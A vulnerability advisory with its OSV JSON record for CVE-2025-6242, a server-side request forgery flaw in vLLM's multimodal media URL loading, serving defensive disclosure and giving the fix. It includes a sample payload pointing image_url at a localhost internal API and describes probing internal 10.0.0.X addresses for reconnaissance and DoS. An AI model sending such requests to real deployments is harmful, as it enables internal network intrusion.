GHSA-3F6C-7FW2-PPM4
Vulnerability from github – Published: 2025-10-07 22:14 – Updated: 2025-10-27 20:00Summary
A Server-Side Request Forgery (SSRF) vulnerability exists in the MediaConnector class within the vLLM project's multimodal feature set. The load_from_url and load_from_url_async methods fetch and process media from user-provided URLs without adequate restrictions on the target hosts. This allows an attacker to coerce the vLLM server into making arbitrary requests to internal network resources.
This vulnerability is particularly critical in containerized environments like llm-d, where a compromised vLLM pod could be used to scan the internal network, interact with other pods, and potentially cause denial of service or access sensitive data. For example, an attacker could make the vLLM pod send malicious requests to an internal llm-d management endpoint, leading to system instability by falsely reporting metrics like the KV cache state.
Vulnerability Details
The core of the vulnerability lies in the MediaConnector.load_from_url method and its asynchronous counterpart. These methods accept a URL string to fetch media content (images, audio, video).
https://github.com/vllm-project/vllm/blob/119f683949dfed10df769fe63b2676d7f1eb644e/vllm/multimodal/utils.py#L97-L113
The function directly processes URLs with http, https, and file schemes. An attacker can supply a URL pointing to an internal IP address or a localhost endpoint. The vLLM server will then initiate a connection to this internal resource.
- HTTP/HTTPS Scheme: An attacker can craft a request like
{"image_url": "http://127.0.0.1:8080/internal_api"}. The vLLM server will send a GET request to this internal endpoint. - File Scheme: The
_load_file_urlmethod attempts to restrict file access to a subdirectory defined by--allowed-local-media-path. While this is a good security measure for local file access, it does not prevent network-based SSRF attacks.
Impact in llm-d Environments
The risk is significantly amplified in orchestrated environments such as llm-d, where multiple pods communicate over an internal network.
-
Denial of Service (DoS): An attacker could target internal management endpoints of other services within the
llm-dcluster. For instance, if a monitoring or metrics service is exposed internally, an attacker could send malformed requests to it. A specific example is an attacker causing the vLLM pod to call an internal API that reports a false KV cache utilization, potentially triggering incorrect scaling decisions or even a system shutdown. -
Internal Network Reconnaissance: Attackers can use the vulnerability to scan the internal network for open ports and services by providing URLs like
http://10.0.0.X:PORTand observing the server's response time or error messages. -
Interaction with Internal Services: Any unsecured internal service becomes a potential target. This could include databases, internal APIs, or other model pods that might not have robust authentication, as they are not expected to be directly exposed.
Delegating this security responsibility to an upper-level orchestrator like llm-d is problematic. The orchestrator cannot easily distinguish between legitimate requests initiated by the vLLM engine for its own purposes and malicious requests originating from user input, thus complicating traffic filtering rules and increasing management overhead.
Fix
See the --allowed-media-domains option discussed here: https://docs.vllm.ai/en/latest/usage/security.html#4-restrict-domains-access-for-media-urls
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "vllm"
},
"ranges": [
{
"events": [
{
"introduced": "0.5.0"
},
{
"fixed": "0.11.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-6242"
],
"database_specific": {
"cwe_ids": [
"CWE-601",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-07T22:14:15Z",
"nvd_published_at": "2025-10-07T20:15:36Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability exists in the `MediaConnector` class within the vLLM project\u0027s multimodal feature set. The `load_from_url` and `load_from_url_async` methods fetch and process media from user-provided URLs without adequate restrictions on the target hosts. This allows an attacker to coerce the vLLM server into making arbitrary requests to internal network resources.\n\nThis vulnerability is particularly critical in containerized environments like `llm-d`, where a compromised vLLM pod could be used to scan the internal network, interact with other pods, and potentially cause denial of service or access sensitive data. For example, an attacker could make the vLLM pod send malicious requests to an internal `llm-d` management endpoint, leading to system instability by falsely reporting metrics like the KV cache state.\n\n### Vulnerability Details\n\nThe core of the vulnerability lies in the `MediaConnector.load_from_url` method and its asynchronous counterpart. These methods accept a URL string to fetch media content (images, audio, video).\n\nhttps://github.com/vllm-project/vllm/blob/119f683949dfed10df769fe63b2676d7f1eb644e/vllm/multimodal/utils.py#L97-L113\n\nThe function directly processes URLs with `http`, `https`, and `file` schemes. An attacker can supply a URL pointing to an internal IP address or a `localhost` endpoint. The vLLM server will then initiate a connection to this internal resource.\n\n* **HTTP/HTTPS Scheme:** An attacker can craft a request like `{\"image_url\": \"http://127.0.0.1:8080/internal_api\"}`. The vLLM server will send a GET request to this internal endpoint.\n* **File Scheme:** The `_load_file_url` method attempts to restrict file access to a subdirectory defined by `--allowed-local-media-path`. While this is a good security measure for local file access, it does not prevent network-based SSRF attacks.\n\n### Impact in `llm-d` Environments\n\nThe risk is significantly amplified in orchestrated environments such as `llm-d`, where multiple pods communicate over an internal network.\n\n1. **Denial of Service (DoS):** An attacker could target internal management endpoints of other services within the `llm-d` cluster. For instance, if a monitoring or metrics service is exposed internally, an attacker could send malformed requests to it. A specific example is an attacker causing the vLLM pod to call an internal API that reports a false KV cache utilization, potentially triggering incorrect scaling decisions or even a system shutdown.\n\n2. **Internal Network Reconnaissance:** Attackers can use the vulnerability to scan the internal network for open ports and services by providing URLs like `http://10.0.0.X:PORT` and observing the server\u0027s response time or error messages.\n\n3. **Interaction with Internal Services:** Any unsecured internal service becomes a potential target. This could include databases, internal APIs, or other model pods that might not have robust authentication, as they are not expected to be directly exposed.\n\nDelegating this security responsibility to an upper-level orchestrator like `llm-d` is problematic. **The orchestrator cannot easily distinguish between legitimate requests initiated by the vLLM engine for its own purposes and malicious requests originating from user input, thus complicating traffic filtering rules and increasing management overhead.**\n\n### Fix\n\nSee the `--allowed-media-domains` option discussed here: https://docs.vllm.ai/en/latest/usage/security.html#4-restrict-domains-access-for-media-urls",
"id": "GHSA-3f6c-7fw2-ppm4",
"modified": "2025-10-27T20:00:22Z",
"published": "2025-10-07T22:14:15Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-3f6c-7fw2-ppm4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6242"
},
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/commit/9d9a2b77f19f68262d5e469c4e82c0f6365ad72d"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-6242"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373716"
},
{
"type": "PACKAGE",
"url": "https://github.com/vllm-project/vllm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "vLLM is vulnerable to Server-Side Request Forgery (SSRF) through `MediaConnector` class"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.